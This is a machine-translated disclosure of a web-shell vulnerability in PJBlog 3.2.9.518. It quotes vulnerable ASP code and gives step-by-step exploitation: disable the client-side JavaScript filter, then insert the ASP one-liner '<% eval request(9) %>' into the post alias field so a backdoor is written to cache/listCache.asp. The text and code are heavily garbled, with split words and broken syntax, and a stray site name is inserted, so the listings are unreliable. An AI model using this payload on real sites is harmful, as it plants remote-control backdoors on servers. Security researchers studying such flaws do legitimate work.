PJBlog 3.2.9.518 getwebshell vulnerability and temporary solution

Author: no minute left

Version: PJblog 3.2.9.518 (the latest version on February 9,) condition for exploits: 1. Use full static mode (full static mode by default) 2. Users can post messages (ordinary users cannot post by default, so it is a little tricky) vulnerability Description: PJblog 3.2.9.518 uses js to filter special characters. In full static mode, an asp Trojan can be inserted when a common user posts a post. PJblog 3.2.9.518 is very secure. The password adopts the sha1 (pass + salt) method and the salt is 6 bits. In this case, it is very effective for injection, it is difficult to crack the password. The code for class/cls_logAction.asp is as follows: <% Class logArticle .................. Omitted .................. OutIndex = outIndex & "[" "A" ";" & AListC & "; (" & clearT (AList) & ")]" & Chr (13) outIndex = outIndex & "[" G ""; "& GListC &"; ("& clearT (GList) &")] "& Chr (13) Dim CateKeys, CateItems, cateHKeys, CateHItemsCateKeys = CateDic. keysCateItems = CateDic. itemsCateHKeys = CateHDic. keysCateHItems = CateHDic. itemsFor I = 0 To CateDic. count-1 outIndex = outIndex & "[" "& CateKeys (I) &" ";" & CateHItems (I) & "; (" & clearT (CateItem S (I) & ")]" & Chr (13) Next SaveList = SaveToFile (outIndex, "cache/listCache. asp ") %> the SaveToFile function is www.2cto.com to write the outIndex content to the cache/listCache. asp. Blogpost. asp calls logArticle. Some codes are as follows: <% ........................ Set lArticle = New logArticlelArticle. categoryID = request. form ("log_CateID") lArticle. logTitle = request. form ("title") lArticle. logAuthor = memNamelArticle. logEditType = request. form ("log_editType") lArticle. logIntroCustom = request. form ("log_IntroC") lArticle. logIntro = request. form ("log_Intro") lArticle. logWeather = request. form ("log_weather") lArticle. logLevel = request. form ("log_Level") lArticle. logC OmmentOrder = request. form ("log_comorder") lArticle. logDisableComment = request. form ("log_DisComment") lArticle. logIsShow = IsShowlArticle. logIsTop = request. form ("log_IsTop") lArticle. logIsDraft = request. form ("log_IsDraft") lArticle. logFrom = request. form ("log_From") lArticle. logFromURL = request. form ("log_FromURL") lArticle. logDisableImage = request. form ("log_disImg") lArticle. logDisableSmile = reques T. form ("log_DisSM") lArticle. logDisableURL = request. form ("log_DisURL") lArticle. logDisableKeyWord = request. form ("log_DisKey") lArticle. logMessage = request. form ("Message") lArticle. logTrackback = request. form ("log_Quote") lArticle. logTags = request. form ("tags") lArticle. logPubTime = request. form ("PubTime") lArticle. logPublishTimeType = request. form ("PubTimeType") If blog_postFile = 2 ThenlArticle. logCna Me = request. form ("cname") lArticle. logCtype = request. form ("ctype") End IflArticle. logReadpw = pwslArticle. logPwtips = pwtipslArticle. logPwtitle = pwtitlelArticle. logPwcomm = pwcommlArticle. logMeta = request. form ("log_Meta") lArticle. logKeyWords = keywordlArticle. logDescription = B _descriptionif request. form ("FirstPost") = 1 thenlArticle. isajax = falselArticle. logIsDraft = falsepostLog = lArticle. ed ItLog (request. form ("postbackId") elselArticle. isajax = falsepostLog = lArticle. postLogend ifSet lArticle = Nothing %> lArticle. logCname = request. form ("cname"), does not filter "<%" and "%>" vulnerability exploitation methods: 1. User Login, post, such as: 2. Disable local js, you must use this step. Otherwise, you cannot enter '<' and '>', because the author has considered security issues and called common. js local filter, common/common. js part of the content is as follows: 1 // create a folder rule example: 2 // <input onblur = "ReplaceInput (this, window. event) "onkeyup =" ReplaceInput (this, window. event) "/> 3 Function ReplaceInput (obj, cevent) {4 var str = ["<", "> ","/","\\",":","*","? "," | "," \ "",/[\ U4E00-\ u9FA5]/g]; 5 if (cevent. keyCode! = 37 & cevent. keyCode! = 39) {6 // obj. value = obj. value. replace (/[\ u4E00-\ u9FA5]/g, ''); 7 for (var I = 0; I <str. length; I ++) {8 obj. value = obj. value. replace (str [I], ""); 9} 10} 11} 3. Insert <% eval request (9) %> In the alias. After submission, in the cache/listCache. A Trojan will be written in asp. The password is a temporary solution of 9, prohibiting common users from posting.